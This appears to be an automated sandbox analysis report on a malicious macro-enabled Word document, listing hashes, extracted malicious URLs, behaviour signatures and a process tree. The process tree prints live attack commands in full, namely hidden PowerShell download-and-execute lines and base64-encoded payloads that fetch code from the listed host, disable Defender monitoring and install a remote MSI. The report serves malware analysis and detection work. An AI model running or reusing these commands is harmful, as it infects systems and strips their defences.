Analysis
-
max time kernel
143s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
20/09/2023, 23:55
Static task
static1
Behavioral task
behavioral1
Sample
ID-191304203986.docm
Resource
win7-20230831-en
General
-
Target
ID-191304203986.docm
-
Size
44KB
-
MD5
8c498f9e6dd65c5a9704208922224661
-
SHA1
1dc2f872c2e23e1eb0c6090909c5807553ad1e75
-
SHA256
38f581881093c044667d565a698aa389f14585a58d5c8b692dc2be851293f1c2
-
SHA512
b6a5eceef6739421ed2f0f6a479df496ecb1894b7694651b24a50689d663b1d7f1b1bf58c2edacf6a2fa59908a58f25cd00e389765871cb1856acb3431bcca50
-
SSDEEP
768:T6D/hwDg0kIo+rQGtBMIYta9l87miNPZjinjUeipoRkqk:T6D/u801rQIBMNg86AB+njUpoqqk
Malware Config
Extracted
http://black-sun-a335.asyorfplmnv.workers.dev/mnwODBptK6jU/zKJFnbnzeum8/37d4fddb6bf2de6611c6655a5cd37972fc33642d/ace.jpg
Extracted
http://black-sun-a335.asyorfplmnv.workers.dev/mnwODBptK6jU/T2qomNwfFUeS/62f331959dde379b2536caed26a74ae8460c0c30/all.png
Extracted
http://black-sun-a335.asyorfplmnv.workers.dev/mnwODBptK6jU/5hwtrLyyHFiv/7b0985c861986ec9e2087ade8273e544009d68e1/SsdxxIp8DqeQ.jpg
Signatures
-
resource yara_rule behavioral2/files/0x000700000001e5ab-120.dat purplefox_msi -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 4392 2736 PowerShell.exe 68 -
Blocklisted process makes network request 3 IoCs
flow pid Process 32 2936 powershell.exe 40 2012 powershell.exe 44 4840 msiexec.exe -
Stops running service(s) 3 TTPs
-
Loads dropped DLL 5 IoCs
pid Process 4168 MsiExec.exe 4168 MsiExec.exe 4168 MsiExec.exe 4168 MsiExec.exe 4168 MsiExec.exe -
Modifies file permissions 1 TTPs 6 IoCs
pid Process 4548 takeown.exe 1564 takeown.exe 4820 takeown.exe 4672 takeown.exe 4284 takeown.exe 4512 takeown.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\B: msiexec.exe -
Drops file in Windows directory 12 IoCs
description ioc Process File opened for modification C:\Windows\Installer\MSIB027.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIB604.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIB885.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIB971.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\dbcode86mk.log msiexec.exe File opened for modification C:\Windows\Installer\MSIA8C3.tmp msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSIB9DF.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSIBA5D.tmp msiexec.exe File created C:\Windows\.xml msiexec.exe -
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3248 sc.exe 4132 sc.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Modifies data under HKEY_USERS 51 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1f msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script\Settings MsiExec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script\Settings\JITDebug = "0" MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 2736 WINWORD.EXE 2736 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 16 IoCs
pid Process 4392 PowerShell.exe 4392 PowerShell.exe 2936 powershell.exe 2936 powershell.exe 2012 powershell.exe 2012 powershell.exe 2012 powershell.exe 2012 powershell.exe 2012 powershell.exe 3308 powershell.exe 3308 powershell.exe 4840 msiexec.exe 4840 msiexec.exe 1848 powershell.exe 1848 powershell.exe 1848 powershell.exe -
Suspicious use of AdjustPrivilegeToken 63 IoCs
description pid Process Token: SeDebugPrivilege 4392 PowerShell.exe Token: SeDebugPrivilege 2936 powershell.exe Token: SeDebugPrivilege 2012 powershell.exe Token: SeDebugPrivilege 3308 powershell.exe Token: SeShutdownPrivilege 3308 powershell.exe Token: SeIncreaseQuotaPrivilege 3308 powershell.exe Token: SeSecurityPrivilege 4840 msiexec.exe Token: SeCreateTokenPrivilege 3308 powershell.exe Token: SeAssignPrimaryTokenPrivilege 3308 powershell.exe Token: SeLockMemoryPrivilege 3308 powershell.exe Token: SeIncreaseQuotaPrivilege 3308 powershell.exe Token: SeMachineAccountPrivilege 3308 powershell.exe Token: SeTcbPrivilege 3308 powershell.exe Token: SeSecurityPrivilege 3308 powershell.exe Token: SeTakeOwnershipPrivilege 3308 powershell.exe Token: SeLoadDriverPrivilege 3308 powershell.exe Token: SeSystemProfilePrivilege 3308 powershell.exe Token: SeSystemtimePrivilege 3308 powershell.exe Token: SeProfSingleProcessPrivilege 3308 powershell.exe Token: SeIncBasePriorityPrivilege 3308 powershell.exe Token: SeCreatePagefilePrivilege 3308 powershell.exe Token: SeCreatePermanentPrivilege 3308 powershell.exe Token: SeBackupPrivilege 3308 powershell.exe Token: SeRestorePrivilege 3308 powershell.exe Token: SeShutdownPrivilege 3308 powershell.exe Token: SeDebugPrivilege 3308 powershell.exe Token: SeAuditPrivilege 3308 powershell.exe Token: SeSystemEnvironmentPrivilege 3308 powershell.exe Token: SeChangeNotifyPrivilege 3308 powershell.exe Token: SeRemoteShutdownPrivilege 3308 powershell.exe Token: SeUndockPrivilege 3308 powershell.exe Token: SeSyncAgentPrivilege 3308 powershell.exe Token: SeEnableDelegationPrivilege 3308 powershell.exe Token: SeManageVolumePrivilege 3308 powershell.exe Token: SeImpersonatePrivilege 3308 powershell.exe Token: SeCreateGlobalPrivilege 3308 powershell.exe Token: SeRestorePrivilege 4840 msiexec.exe Token: SeTakeOwnershipPrivilege 4840 msiexec.exe Token: SeRestorePrivilege 4840 msiexec.exe Token: SeTakeOwnershipPrivilege 4840 msiexec.exe Token: SeRestorePrivilege 4840 msiexec.exe Token: SeTakeOwnershipPrivilege 4840 msiexec.exe Token: SeRestorePrivilege 4840 msiexec.exe Token: SeTakeOwnershipPrivilege 4840 msiexec.exe Token: SeRestorePrivilege 4840 msiexec.exe Token: SeTakeOwnershipPrivilege 4840 msiexec.exe Token: SeRestorePrivilege 4840 msiexec.exe Token: SeTakeOwnershipPrivilege 4840 msiexec.exe Token: SeRestorePrivilege 4840 msiexec.exe Token: SeTakeOwnershipPrivilege 4840 msiexec.exe Token: SeShutdownPrivilege 2236 powercfg.exe Token: SeCreatePagefilePrivilege 2236 powercfg.exe Token: SeDebugPrivilege 1848 powershell.exe Token: SeTakeOwnershipPrivilege 1564 takeown.exe Token: SeTakeOwnershipPrivilege 4820 takeown.exe Token: SeTakeOwnershipPrivilege 4672 takeown.exe Token: SeTakeOwnershipPrivilege 4284 takeown.exe Token: SeTakeOwnershipPrivilege 4512 takeown.exe Token: SeTakeOwnershipPrivilege 4548 takeown.exe Token: SeRestorePrivilege 4840 msiexec.exe Token: SeTakeOwnershipPrivilege 4840 msiexec.exe Token: SeRestorePrivilege 4840 msiexec.exe Token: SeTakeOwnershipPrivilege 4840 msiexec.exe -
Suspicious use of SetWindowsHookEx 14 IoCs
pid Process 2736 WINWORD.EXE 2736 WINWORD.EXE 2736 WINWORD.EXE 2736 WINWORD.EXE 2736 WINWORD.EXE 2736 WINWORD.EXE 2736 WINWORD.EXE 2736 WINWORD.EXE 2736 WINWORD.EXE 2736 WINWORD.EXE 2736 WINWORD.EXE 2736 WINWORD.EXE 2736 WINWORD.EXE 2736 WINWORD.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2736 wrote to memory of 4392 2736 WINWORD.EXE 89 PID 2736 wrote to memory of 4392 2736 WINWORD.EXE 89 PID 4392 wrote to memory of 2936 4392 PowerShell.exe 91 PID 4392 wrote to memory of 2936 4392 PowerShell.exe 91 PID 2936 wrote to memory of 2012 2936 powershell.exe 93 PID 2936 wrote to memory of 2012 2936 powershell.exe 93 PID 2012 wrote to memory of 3308 2012 powershell.exe 94 PID 2012 wrote to memory of 3308 2012 powershell.exe 94 PID 3308 wrote to memory of 2276 3308 powershell.exe 95 PID 3308 wrote to memory of 2276 3308 powershell.exe 95 PID 2276 wrote to memory of 2948 2276 csc.exe 96 PID 2276 wrote to memory of 2948 2276 csc.exe 96 PID 4840 wrote to memory of 4168 4840 msiexec.exe 99 PID 4840 wrote to memory of 4168 4840 msiexec.exe 99 PID 4840 wrote to memory of 4168 4840 msiexec.exe 99 PID 4840 wrote to memory of 4716 4840 msiexec.exe 100 PID 4840 wrote to memory of 4716 4840 msiexec.exe 100 PID 4840 wrote to memory of 4716 4840 msiexec.exe 100 PID 4716 wrote to memory of 2236 4716 MsiExec.exe 101 PID 4716 wrote to memory of 2236 4716 MsiExec.exe 101 PID 4716 wrote to memory of 2236 4716 MsiExec.exe 101 PID 4716 wrote to memory of 1848 4716 MsiExec.exe 103 PID 4716 wrote to memory of 1848 4716 MsiExec.exe 103 PID 4716 wrote to memory of 1848 4716 MsiExec.exe 103 PID 4716 wrote to memory of 1704 4716 MsiExec.exe 105 PID 4716 wrote to memory of 1704 4716 MsiExec.exe 105 PID 4716 wrote to memory of 1704 4716 MsiExec.exe 105 PID 4716 wrote to memory of 1756 4716 MsiExec.exe 108 PID 4716 wrote to memory of 1756 4716 MsiExec.exe 108 PID 4716 wrote to memory of 1756 4716 MsiExec.exe 108 PID 4716 wrote to memory of 3356 4716 MsiExec.exe 109 PID 4716 wrote to memory of 3356 4716 MsiExec.exe 109 PID 4716 wrote to memory of 3356 4716 MsiExec.exe 109 PID 4716 wrote to memory of 3780 4716 MsiExec.exe 111 PID 4716 wrote to memory of 3780 4716 MsiExec.exe 111 PID 4716 wrote to memory of 3780 4716 MsiExec.exe 111 PID 4716 wrote to memory of 1956 4716 MsiExec.exe 113 PID 4716 wrote to memory of 1956 4716 MsiExec.exe 113 PID 4716 wrote to memory of 1956 4716 MsiExec.exe 113 PID 4716 wrote to memory of 512 4716 MsiExec.exe 115 PID 4716 wrote to memory of 512 4716 MsiExec.exe 115 PID 4716 wrote to memory of 512 4716 MsiExec.exe 115 PID 4716 wrote to memory of 4160 4716 MsiExec.exe 117 PID 4716 wrote to memory of 4160 4716 MsiExec.exe 117 PID 4716 wrote to memory of 4160 4716 MsiExec.exe 117 PID 4716 wrote to memory of 3212 4716 MsiExec.exe 120 PID 4716 wrote to memory of 3212 4716 MsiExec.exe 120 PID 4716 wrote to memory of 3212 4716 MsiExec.exe 120 PID 4716 wrote to memory of 2220 4716 MsiExec.exe 122 PID 4716 wrote to memory of 2220 4716 MsiExec.exe 122 PID 4716 wrote to memory of 2220 4716 MsiExec.exe 122 PID 4716 wrote to memory of 5108 4716 MsiExec.exe 124 PID 4716 wrote to memory of 5108 4716 MsiExec.exe 124 PID 4716 wrote to memory of 5108 4716 MsiExec.exe 124 PID 4716 wrote to memory of 1560 4716 MsiExec.exe 126 PID 4716 wrote to memory of 1560 4716 MsiExec.exe 126 PID 4716 wrote to memory of 1560 4716 MsiExec.exe 126 PID 4716 wrote to memory of 4348 4716 MsiExec.exe 128 PID 4716 wrote to memory of 4348 4716 MsiExec.exe 128 PID 4716 wrote to memory of 4348 4716 MsiExec.exe 128 PID 4716 wrote to memory of 3344 4716 MsiExec.exe 130 PID 4716 wrote to memory of 3344 4716 MsiExec.exe 130 PID 4716 wrote to memory of 3344 4716 MsiExec.exe 130 PID 4716 wrote to memory of 2576 4716 MsiExec.exe 132
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ID-191304203986.docm" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2736 -
C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exePowerShell -nop -exec bypass -w hidden -Enc DQAKAGYAbwByACgAJABpAD0AMQA7ACQAaQAgAC0AbABlACAAMQAwADAAOwAkAGkAKwArACkADQAKAHsADQAKAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAG4AbwBwACAALQBlAHgAZQBjACAAYgB5AHAAYQBzAHMAIAAtAGMAIAAiAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvAGIAbABhAGMAawAtAHMAdQBuAC0AYQAzADMANQAuAGEAcwB5AG8AcgBmAHAAbABtAG4AdgAuAHcAbwByAGsAZQByAHMALgBkAGUAdgAvAG0AbgB3AE8ARABCAHAAdABLADYAagBVAC8AegBLAEoARgBuAGIAbgB6AGUAdQBtADgALwAzADcAZAA0AGYAZABkAGIANgBiAGYAMgBkAGUANgA2ADEAMQBjADYANgA1ADUAYQA1AGMAZAAzADcAOQA3ADIAZgBjADMAMwA2ADQAMgBkAC8AYQBjAGUALgBqAHAAZwAnACkAIgA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgADEAOAAwAA0ACgB9AA0ACgA=2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4392 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://black-sun-a335.asyorfplmnv.workers.dev/mnwODBptK6jU/zKJFnbnzeum8/37d4fddb6bf2de6611c6655a5cd37972fc33642d/ace.jpg')"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2936 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -exec bypass -w hidden -Enc DQAKAGYAbwByACgAJABpAD0AMQA7ACQAaQAgAC0AbABlACAAMQAwADAAOwAkAGkAKwArACkADQAKAHsADQAKAHMAYQBsACAAYQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAOwBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwAkAGcAPQBhACAAUwB5AHMAdABlAG0ALgBEAHIAYQB3AGkAbgBnAC4AQgBpAHQAbQBhAHAAKAAoAGEAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBPAHAAZQBuAFIAZQBhAGQAKAAiAGgAdAB0AHAAOgAvAC8AYgBsAGEAYwBrAC0AcwB1AG4ALQBhADMAMwA1AC4AYQBzAHkAbwByAGYAcABsAG0AbgB2AC4AdwBvAHIAawBlAHIAcwAuAGQAZQB2AC8AbQBuAHcATwBEAEIAcAB0AEsANgBqAFUALwBUADIAcQBvAG0ATgB3AGYARgBVAGUAUwAvADYAMgBmADMAMwAxADkANQA5AGQAZABlADMANwA5AGIAMgA1ADMANgBjAGEAZQBkADIANgBhADcANABhAGUAOAA0ADYAMABjADAAYwAzADAALwBhAGwAbAAuAHAAbgBnACIAKQApADsAJABvAD0AYQAgAEIAeQB0AGUAWwBdACAAMgA1ADYAMAA7ACgAMAAuAC4AMwAxACkAfAAlAHsAZgBvAHIAZQBhAGMAaAAoACQAeAAgAGkAbgAoADAALgAuADcAOQApACkAewAkAHAAPQAkAGcALgBHAGUAdABQAGkAeABlAGwAKAAkAHgALAAkAF8AKQA7ACQAbwBbACQAXwAqADgAMAArACQAeABdAD0AKABbAG0AYQB0AGgAXQA6ADoARgBsAG8AbwByACgAKAAkAHAALgBCAC0AYgBhAG4AZAAxADUAKQAqADEANgApAC0AYgBvAHIAKAAkAHAALgBHACAALQBiAGEAbgBkACAAMQA1ACkAKQB9AH0AOwBJAEUAWAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABvAFsAMAAuAC4AMgA1ADEAMgBdACkAKQA7AE0AcwBpAE0AYQBrAGUAIABoAHQAdABwADoALwAvAGIAbABhAGMAawAtAHMAdQBuAC0AYQAzADMANQAuAGEAcwB5AG8AcgBmAHAAbABtAG4AdgAuAHcAbwByAGsAZQByAHMALgBkAGUAdgAvAG0AbgB3AE8ARABCAHAAdABLADYAagBVAC8ANQBoAHcAdAByAEwAeQB5AEgARgBpAHYALwA3AGIAMAA5ADgANQBjADgANgAxADkAOAA2AGUAYwA5AGUAMgAwADgANwBhAGQAZQA4ADIANwAzAGUANQA0ADQAMAAwADkAZAA2ADgAZQAxAC8AUwBzAGQAeAB4AEkAcAA4AEQAcQBlAFEALgBqAHAAZwA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgADEAOAAwAA0ACgB9AA0ACgA=4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2012 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -exec bypass -EncodedCommand DQAKAFMAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEQAaQBzAGEAYgBsAGUAUgBlAGEAbAB0AGkAbQBlAE0AbwBuAGkAdABvAHIAaQBuAGcAIAAkAHQAcgB1AGUADQAKAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAiACQAZQBuAHYAOgB3AGkAbgBkAGkAcgAiAA0ACgAkAFIAZQBnAGsAZQB5AHAAYQB0AGgAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXAA3AC0AWgBpAHAAIgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABQAEYAOAA4AGQATgBjAGQAcwBEAEQAcQBlADcAWgBmAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAaQAuAGQAbABsACIALAAgAEMAaABhAHIAUwBlAHQAPQBDAGgAYQByAFMAZQB0AC4AQQB1AHQAbwApAF0ADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATQBzAGkASQBuAHMAdABhAGwAbABQAHIAbwBkAHUAYwB0ACgAcwB0AHIAaQBuAGcAIABwAGEAYwBrAGEAZwBlAFAAYQB0AGgALAAgAHMAdAByAGkAbgBnACAAYwBvAG0AbQBhAG4AZABMAGkAbgBlACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAGkALgBkAGwAbAAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABNAHMAaQBTAGUAdABJAG4AdABlAHIAbgBhAGwAVQBJACgAaQBuAHQAIABkAHcAVQBJAEwAZQB2AGUAbAAsACAASQBuAHQAUAB0AHIAIABwAGgAVwBuAGQAKQA7AA0ACgB9AA0ACgAiAEAADQAKAGQAbwANAAoAewANAAoAJABtAHMAaQBwAGEAdABoAEEAIAA9ACAAIgBoAHQAdABwADoALwAvAGIAbABhAGMAawAtAHMAdQBuAC0AYQAzADMANQAuAGEAcwB5AG8AcgBmAHAAbABtAG4AdgAuAHcAbwByAGsAZQByAHMALgBkAGUAdgAvAG0AbgB3AE8ARABCAHAAdABLADYAagBVAC8ANQBoAHcAdAByAEwAeQB5AEgARgBpAHYALwA3AGIAMAA5ADgANQBjADgANgAxADkAOAA2AGUAYwA5AGUAMgAwADgANwBhAGQAZQA4ADIANwAzAGUANQA0ADQAMAAwADkAZAA2ADgAZQAxAC8AUwBzAGQAeAB4AEkAcAA4AEQAcQBlAFEALgBqAHAAZwAiAA0ACgAkAG0AcwBpAHAAYQB0AGgAQQBMAEwAIAA9ACAAQAAoACIAJABtAHMAaQBwAGEAdABoAEEAIgAsACIAJABtAHMAaQBwAGEAdABoAEEAIgApAA0ACgAkAE4AZABTAFUASQB3AHUAdQBXAG4AcABZAEgAegBGAHUAIAA9ACAAZwBlAHQALQByAGEAbgBkAG8AbQAgACQAbQBzAGkAcABhAHQAaABBAEwATAA7AA0ACgBbAFAARgA4ADgAZABOAGMAZABzAEQARABxAGUANwBaAGYAXQA6ADoATQBzAGkAUwBlAHQASQBuAHQAZQByAG4AYQBsAFUASQAoADIALAAwACkAOwANAAoAWwBQAEYAOAA4AGQATgBjAGQAcwBEAEQAcQBlADcAWgBmAF0AOgA6AE0AcwBpAEkAbgBzAHQAYQBsAGwAUAByAG8AZAB1AGMAdAAoACIAJABOAGQAUwBVAEkAdwB1AHUAVwBuAHAAWQBIAHoARgB1ACIALAAiACIAKQANAAoAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAANgAwAA0ACgB9AA0ACgB1AG4AdABpAGwAIAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAFIAZQBnAGsAZQB5AHAAYQB0AGgAIAAtAG4AYQBtAGUAIA